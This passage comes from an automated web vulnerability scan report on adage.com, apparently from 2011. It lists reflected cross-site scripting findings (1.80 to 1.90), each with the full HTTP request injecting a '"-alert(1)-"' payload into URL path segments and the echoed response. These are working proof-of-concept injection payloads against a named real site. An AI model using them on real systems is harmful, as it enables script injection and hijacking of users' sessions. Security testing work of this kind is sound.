hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail4fff7"-alert(1)-"3fade222f3c/digitalalist-022811-rr.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.c
...[SNIP]...

1.80. http://adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalalist-022811-rr.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18340"-alert(1)-"32365ab770 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail/digitalalist-022811-rr.jpg18340"-alert(1)-"32365ab770?1298844621 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=4BBE23C8D8130CD77C92E054C7602E7616503128; path=/
Set-Cookie: HMAC=C67C9BA3D45D64D16E54014DC60EE8021C4611C6; path=/
Set-Cookie: HMAC=9E12DA5071045DF698137F38FD902479F7E3F9E2; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49488
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
/CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298844621";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail/digitalalist-022811-rr.jpg18340"-alert(1)-"32365ab770"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.81. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e6af"-alert(1)-"fce269f3ba2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images8e6af"-alert(1)-"fce269f3ba2/bin/image/rightrail/digitalconf2011-rr-040611.jpg?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=35D8B0A760E64FFE49E131C883B827DAF4A59C4B; path=/
Set-Cookie: HMAC=A621210025B7A1CEED2AF2B685DB93D1C4D44132; path=/
Set-Cookie: HMAC=79498CEC1DABB4DB8B02710C7DFDABD0EAB0774D; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images8e6af"-alert(1)-"fce269f3ba2/bin/image/rightrail/digitalconf2011-rr-040611.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.
...[SNIP]...

1.82. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91819"-alert(1)-"1f8001d74a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin91819"-alert(1)-"1f8001d74a5/image/rightrail/digitalconf2011-rr-040611.jpg?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:38 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=5196DF328032DA374CBCA6ABD1E699CF85D4DE1E; path=/
Set-Cookie: HMAC=DE694482C060A2ACC6E5BAFA4625482406562F7C; path=/
Set-Cookie: HMAC=07EDCC0A6456B52DB5DE3F206CA832D6E1B7A521; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin91819"-alert(1)-"1f8001d74a5/image/rightrail/digitalconf2011-rr-040611.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="
...[SNIP]...

1.83. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33f67"-alert(1)-"555f3d15fb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image33f67"-alert(1)-"555f3d15fb7/rightrail/digitalconf2011-rr-040611.jpg?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=42F68FB4585FDBAA7200F42759AA80B0C20AB3B6; path=/
Set-Cookie: HMAC=FE7745E41786DC9F34C85BAA11D4FAEE2D926EC1; path=/
Set-Cookie: HMAC=7915378F8A3686EBFD965FD381A117C9500F4D7B; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image33f67"-alert(1)-"555f3d15fb7/rightrail/digitalconf2011-rr-040611.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
...[SNIP]...

1.84. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c6d7"-alert(1)-"f252829a817 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail9c6d7"-alert(1)-"f252829a817/digitalconf2011-rr-040611.jpg?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=363EE0A4E10D6A8E52E9E8EC26CB41F6681643C2; path=/
Set-Cookie: HMAC=F915197A6916877B5C859835834687AC1CDFD478; path=/
Set-Cookie: HMAC=335BDDB342933866F6A259B74438BEB69CB0314A; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail9c6d7"-alert(1)-"f252829a817/digitalconf2011-rr-040611.jpg"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.85. http://adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bin/image/rightrail/digitalconf2011-rr-040611.jpg

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd32d"-alert(1)-"b0f2a928db4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bin/image/rightrail/digitalconf2011-rr-040611.jpgdd32d"-alert(1)-"b0f2a928db4?1302126749 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=98BABB1D468228D3F0A0E5E54102412561015CC6; path=/
Set-Cookie: HMAC=D2C0874BC840C4BC23ABDF495CA8E2D39B0B248B; path=/
Set-Cookie: HMAC=C0AB1BBC72E3FDDFDCAB319B0EF6580229B41D6E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49492
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
NFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1302126749";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bin/image/rightrail/digitalconf2011-rr-040611.jpgdd32d"-alert(1)-"b0f2a928db4"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.86. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/agency_news.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed158"-alert(1)-"e8877cf2e51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesed158"-alert(1)-"e8877cf2e51/bottom/menus/agency_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=98AC1FFC09CE811728175DEE34A9694FC11F8284; path=/
Set-Cookie: HMAC=86DD4263D7B9D38FD42C2AB6566E1566EFDE1174; path=/
Set-Cookie: HMAC=98EC0002721ABC56FA42F1533BA752FD46B7DCE3; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagesed158"-alert(1)-"e8877cf2e51/bottom/menus/agency_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!
...[SNIP]...

1.87. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/agency_news.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad82f"-alert(1)-"f3588c172fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottomad82f"-alert(1)-"f3588c172fb/menus/agency_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:34 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=113070EA1C5D31940DF983F0F3B51B780DF35489; path=/
Set-Cookie: HMAC=F8DB2743043A563B00DF80427CAE12490B770DFC; path=/
Set-Cookie: HMAC=EB560CC6B571D3BF5B1B849D6AE9D158F71FEA28; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottomad82f"-alert(1)-"f3588c172fb/menus/agency_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.j
...[SNIP]...

1.88. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/agency_news.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54949"-alert(1)-"b7bdff866a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus54949"-alert(1)-"b7bdff866a3/agency_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=53308B94AE01E45B31A9C1FE1BEB8FC3CF9BBF23; path=/
Set-Cookie: HMAC=98DD410FC021DD3B8059045FE15B20BD5EDA7C55; path=/
Set-Cookie: HMAC=66F2D4FB75340305D444C399723FE88A47F14DCD; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus54949"-alert(1)-"b7bdff866a3/agency_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hb
...[SNIP]...

1.89. http://adage.com/images/bottom/menus/agency_news.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/agency_news.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8074b"-alert(1)-"f96571d605a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/agency_news.png8074b"-alert(1)-"f96571d605a?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=59BE7FE4471BB2B760B7ACFF47B119B7783608D3; path=/
Set-Cookie: HMAC=2230ADCFA68F69A782A678417E315B5BED8BC612; path=/
Set-Cookie: HMAC=A86AF01F12B991A4F4CD00A19A849902A6F29B08; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
in.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/agency_news.png8074b"-alert(1)-"f96571d605a"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.90. http://adage.com/images/bottom/menus/cmo_strategy.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/cmo_strategy.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e00f"-alert(1)-"2dd77db2802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images9e00f"-alert(1)-"2dd77db2802/bottom/menus/cmo_strategy.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
